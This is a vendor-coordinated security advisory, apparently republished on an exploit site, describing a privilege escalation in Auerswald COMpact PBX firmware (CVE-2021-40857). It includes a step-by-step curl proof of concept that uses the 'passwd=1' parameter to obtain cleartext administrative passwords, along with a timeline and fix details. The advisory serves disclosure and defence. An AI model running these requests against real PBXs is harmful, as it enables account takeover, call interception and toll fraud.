Auerswald COMpact 8.0B - Privilege Escalation

2021-12-06
ID: 105005
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 06/12/2021
# Exploit Author: RedTeam Pentesting GmbH

Advisory: Auerswald COMpact Privilege Escalation


RedTeam Pentesting discovered a vulnerability in the web-based
management interface of the Auerswald COMpact 5500R PBX which allows
low-privileged users to access passwords of administrative user accounts.


Details
=======

Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
Affected Versions: <= 8.0B (COMpact  4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
Fixed Versions: 8.2B
Vulnerability Type: Privilege Escalation
Security Risk: high
Vendor URL: https://www.auerswald.de/en/product/compact-5500r
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-005
Advisory Status: published
CVE: CVE-2021-40857
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40857


Introduction
============

"Fully modular VoIP appliance for more efficient communication processes
With the COMpact 5500R, you are originally equipped for everyday
business - now and in the future.

The fully modular architecture with 80 IP channels and all the functions
of a large ITC server allows up to 112 subscribers and thus scales with
your company.

Continuous maintanance and expansion of the system software makes this
versatile IP server a future-proof investment in any business
communication."

(from the vendor's homepage)


More Details
============

Attackers with low-privileged user accounts, for example those that are
used by VoIP phones, can log into the web-based management interface of
the COMpact 5500R PBX. Afterwards, the list of user accounts can be
listed and details shown for each user account. Adding the URL parameter
"passwd=1" then also includes the clear text password for each user
account, including administrative ones, which can then be used to
authenticate against the management interface.


Proof of Concept
================

The command-line HTTP client curl[1] can be used as follows to log in
with the username "123" and the password "secret" (shortened and
formatted to increase readability):

------------------------------------------------------------------------
$ curl --anyauth --user 123:secret --include https://192.168.1.2/tree

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=SNKIFTVQBGDRFJB; HttpOnly; Path=/
[...]

[
  {
    "login": 1,
    "userId": 1234,
    "userRufNr": "123",
    "userName": "123",
    "pbxType": 35,
    "pbxId": 0,
    "pbx": "COMpact 5500R",
    "pbxEdit": "Comp.5500R",
    "isActivated": 1,
    "dongleTnCount": 112,
    "currentConfig": 34,
    "cur": "EUR",
    "language": 0,
    "hidePrivat": 1,
    "offlineConfig": false
  },
  [...]
]
------------------------------------------------------------------------

The server returns a JSON document describing the user account as well
as a session ID in a cookie. This session ID can then be used to access
other API endpoints on the PBX. The following listing shows the request to
the path "/logstatus_state", which returns the current access level:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
  https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Teilnehmer"}
------------------------------------------------------------------------

The access level in this case is "Teilnehmer" (member).

The list of all other users can be requested as follows:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
  https://192.168.1.2/cfg_data_teilnehmer

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

[
[...]
{"id":1234,"nr":"123","name":"Example User","isSubAdmin":false},
[...]
{"id":2222,"nr":"555","name":"sub-admin other user","isSubAdmin":true}
[...]
]
------------------------------------------------------------------------

Two user accounts are shown in the listing above: the current user's
account with the ID 1234 and a different user account with so-called
"sub-admin" privileges with the ID 2222.

Details about a particular user account with a given ID can be requested
like this:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
  'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"rufnr":"123","name":"Example User",[...],
"privatPin":"XXXXXX","privatPass":"XXXXXXXXXX","privatToken":"XXXXXXXXXX",
[...], "isSubadmin":0,[...]}
------------------------------------------------------------------------

In the returned JSON document, the values of the fields for the PIN,
token and password are replaced by "XXX". But if the URL parameter
"passwd" is set to the value 1, the values are returned in plain text:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"rufnr":"123","name":"Example User",[...],
"privatPin":"12345678","privatPass":"secretpassword",
"privatToken":"yyyyyyyyyyyyy",[...], "isSubadmin":0,[...]}
------------------------------------------------------------------------

This can be repeated for other user accounts, for example for the
user account with the ID 2222 shown it the listing earlier. The server
returns the plain text password for the other user account:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
  'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=2222&passwd=1

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"rufnr":"555","name":"sub-admin other user","privatPin":"99999999",
"privatPass":"verysecretpassword","privatToken":"zzzzzzzzzz",
[...],"isSubadmin":1,[...]}
------------------------------------------------------------------------

The password can then be used to log into the PBX with the other user
account:

------------------------------------------------------------------------
$ curl --anyauth --user sub-admin:verysecretpassword --include \
  https://192.168.1.2/tree

[...]
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
[...]

[{"login":2,"userId":2222,[...]}]
------------------------------------------------------------------------

Checking the access level with the new session ID shows that the user is
now logged in with an administrative account:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
  https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Sub-Administrator"}%
------------------------------------------------------------------------


Workaround
==========

Disable or restrict access to the web-based management interface if
possible.


Fix
===

Upgrade to a firmware version which corrects this vulnerability.


Security Risk
=============

Attackers who have acquired access to a low-privileged user account, for
example by extracting such an account from a VoIP phone, can log into
the web-based management interface of the COMpact 5500R PBX and access
clear text passwords for other user accounts, including those with the
"sub-admin" privilege. After logging in with these newly acquired
credentials, attackers can access configuration settings and most other
functions.

They can then for example create new SIP credentials and use them to
call premium rate phone lines they operate to generate revenue. They can
monitor and even redirect all incoming and outgoing phone calls and
record all Ethernet data traffic.

Due to the severe and far-reaching consequences and despite the
prerequisite of having to know an existing low-privilege user account,
this vulnerability rated as a high risk.


Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-12-06 Advisory published


References
==========

[1] https://curl.se/


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/


-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen
1-4-2 (www01)